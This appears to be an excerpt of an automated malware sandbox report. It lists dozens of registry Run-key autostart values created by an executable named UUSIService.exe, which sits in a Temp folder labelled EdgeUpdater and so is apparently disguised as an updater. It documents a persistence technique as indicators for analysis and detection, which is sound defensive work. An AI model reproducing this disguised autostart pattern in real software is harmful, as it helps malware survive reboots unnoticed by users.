Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_955fea78b7ac40eb9e0fc1887c107a2c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_33895dbc660f4ee0ba9976b87a46a17a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_33895dbc660f4ee0ba9976b87a46a17a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e9cecf989ad439a9ec2c42b342d62ce	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e9cecf989ad439a9ec2c42b342d62ce	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9cf520f371764b82b857d9cb33c1c1b9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9cf520f371764b82b857d9cb33c1c1b9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_61bb4d0b2be347d5b8a4589622574dd5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_61bb4d0b2be347d5b8a4589622574dd5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d5d003e9460c457599c41af0e18b8a20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d5d003e9460c457599c41af0e18b8a20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_8430e0f39de04c7e92809b55ce5194ef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_8430e0f39de04c7e92809b55ce5194ef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7cf7889a077643359b7c592223c68d2b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7cf7889a077643359b7c592223c68d2b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e8b69fc719b4685bc7cffc277dfe9af	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e8b69fc719b4685bc7cffc277dfe9af	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2e42a6c9e632472c80b013b90c920c12	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2e42a6c9e632472c80b013b90c920c12	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1f407ae6ef78497d8ebdc632e5989198	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1f407ae6ef78497d8ebdc632e5989198	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c587999a94c44422aa779974152e2def	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c587999a94c44422aa779974152e2def	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_cc346c146a7b4c2f8d3f90dfc0881616	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_cc346c146a7b4c2f8d3f90dfc0881616	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1d2b613aae554f4592fc7f30a2b8e152	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1d2b613aae554f4592fc7f30a2b8e152	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b1c4841ee0934c59a49b04282194c170	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b1c4841ee0934c59a49b04282194c170	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0511349c3dbb4691833ff1355d37fe6b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0511349c3dbb4691833ff1355d37fe6b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e4c8211b4d14fcda4888b1060900ab7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e4c8211b4d14fcda4888b1060900ab7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_54d21a8b7b4f4089a6ad6b70a45ffe88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_54d21a8b7b4f4089a6ad6b70a45ffe88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e750c6ad326847c880eaba3a1747c998	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e750c6ad326847c880eaba3a1747c998	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_6b650992195e484781a184773079273e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_6b650992195e484781a184773079273e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_aa38d90c52324913a8169b02ba548943	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_aa38d90c52324913a8169b02ba548943	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_150d8e672210470a8c9a467c5aed098e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_150d8e672210470a8c9a467c5aed098e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b1123db6f8864957b4b3c8d312b6bfaa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b1123db6f8864957b4b3c8d312b6bfaa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c31bcba2058447588bcbb20d3a940a1e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c31bcba2058447588bcbb20d3a940a1e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_25d83f3da8164df488b647318d0b6cee	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_25d83f3da8164df488b647318d0b6cee	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f6f1c51b990640da92f24a16f0864041	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f6f1c51b990640da92f24a16f0864041	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ef3b70dec06a4649a13f2318456eb822	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ef3b70dec06a4649a13f2318456eb822	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f3cb7c72ddcf45a4bf535aa7a856966b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f3cb7c72ddcf45a4bf535aa7a856966b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_dbd5e1c384bd40a98a7962069001d3aa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_dbd5e1c384bd40a98a7962069001d3aa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9ddb7854ccd14bb28f58b9102a370349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9ddb7854ccd14bb28f58b9102a370349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7dbd3793a4a6491e93e0be29b6100c76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7dbd3793a4a6491e93e0be29b6100c76	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93e00ab5d94e49f082f737977b67609d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93e00ab5d94e49f082f737977b67609d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e9214a2484f8414d9a3a5068f9f0e390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e9214a2484f8414d9a3a5068f9f0e390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_8f5da03a9f7e479d852cef310f35c89d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_8f5da03a9f7e479d852cef310f35c89d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_991c2f388562482391a48b1bb0c27364	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_991c2f388562482391a48b1bb0c27364	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5d165eda359744a99df25c8ac2974c25	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5d165eda359744a99df25c8ac2974c25	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_fef7cb3e6cc445baaa9ae95e30fb6f18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_fef7cb3e6cc445baaa9ae95e30fb6f18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_076f22289009438ab18e4242d83866f2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_076f22289009438ab18e4242d83866f2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_055ec554acf04ab1a841bdc5e4cad617	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_055ec554acf04ab1a841bdc5e4cad617	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_825c64211e994beb8abc8f993be2c112	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_825c64211e994beb8abc8f993be2c112	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b132c1b1115e49aa8d26472508dc6e6a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b132c1b1115e49aa8d26472508dc6e6a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ea931cc1ba394a7b98a7cd9d7539c5dd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ea931cc1ba394a7b98a7cd9d7539c5dd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e29572af1d24e07883ef344c29f493a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e29572af1d24e07883ef344c29f493a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_997f47db1fea4ac18f161ce7c16044a9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_997f47db1fea4ac18f161ce7c16044a9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_38016393783049bd8526f5ddfbb34883	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_38016393783049bd8526f5ddfbb34883	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3311586bb493427981f86de57ccb1c11	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3311586bb493427981f86de57ccb1c11	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1babeefc1c5c4fcdbce69ef42a91683d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_1babeefc1c5c4fcdbce69ef42a91683d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_a64a465fcb5949bcb0685254854c3423	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_a64a465fcb5949bcb0685254854c3423	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9c244486874b43958bb9ac03512c13ba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9c244486874b43958bb9ac03512c13ba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_265da08d02de42c2bf9a8a47f2eb5571	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_265da08d02de42c2bf9a8a47f2eb5571	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9fe261ed906c4d4abc7a19d0c2c4c1f2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9fe261ed906c4d4abc7a19d0c2c4c1f2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_11efee7e6f2d4305b50f3d394b507378	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_11efee7e6f2d4305b50f3d394b507378	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_98efe74ccd0f4ea68f4365b9bc9bd20c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_98efe74ccd0f4ea68f4365b9bc9bd20c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e3d5f095014e421c870e7aeacf01bfb2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e3d5f095014e421c870e7aeacf01bfb2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_402bc198741c4e559b63235ebec92217	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_402bc198741c4e559b63235ebec92217	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_acb66be4be1d43bcbbff106598f468f3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_acb66be4be1d43bcbbff106598f468f3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c5d858544ea14a74bac226d74223cc00	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c5d858544ea14a74bac226d74223cc00	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0c617bf0702d4a4fae93ce41d0fc6bf8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0c617bf0702d4a4fae93ce41d0fc6bf8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_87b89c9c4f284f3aa28892d3f911baa2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_87b89c9c4f284f3aa28892d3f911baa2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4690d17558d3493bb2aecefc7aeacbcf	Jump to behavior
